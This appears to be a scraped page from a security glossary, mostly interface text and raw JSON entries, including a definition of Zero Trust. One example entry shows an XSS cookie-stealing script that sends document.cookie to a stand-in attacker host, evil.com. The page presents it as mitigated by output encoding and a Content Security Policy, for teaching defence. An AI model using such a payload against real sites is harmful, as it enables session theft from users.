Reference Tool
Information Security Glossary
Every term, acronym, and concept from the Information Security Hub — defined clearly, connected to related ideas, and tagged by difficulty level.
Search or browse alphabetically below
Select a term to explore
Click any term from the list, or search above
Continue Learning
Explore Tech Jacks Solutions
Results for:
# MITIGATED — output encoding + Content Security Policy header Response Header: Content-Security-Policy: default-src 'self'; script-src 'self' Response Body:Results for: <script>document.location='https://evil.com/steal?c='+document.cookie</script>
# Encoded output renders as plain text; CSP blocks inline script execution" }, "articleSlug": null }, { "id": "zero-trust", "term": "Zero Trust", "letter": "Z", "difficulty": "intermediate", "category": "Defenses", "aliases": [ "Zero Trust Architecture", "ZTA" ], "definition": "A security model based on the principle of 'never trust, always verify.' Zero Trust assumes no implicit trust based on network location — every access request is fully authenticated, authorized, and encrypted regardless of whether it originates inside or outside the network perimeter. NIST SP 800-207 defines the architecture. Key tenets: verify explicitly, use least-privilege access, and assume breach.", "related": [ { "id": "least-privilege", "weight": 3 }, { "id": "mfa", "weight": 2 }, { "id": "defense-in-depth", "weight": 2 }, { "id": "access-control", "weight": 2 }, { "id": "network-segmentation", "weight": 2 }, { "id": "vpn", "weight": 2 } ], "example": null, "articleSlug": null, "authorityUrl": "https://csrc.nist.gov/glossary/term/zero_trust" } ];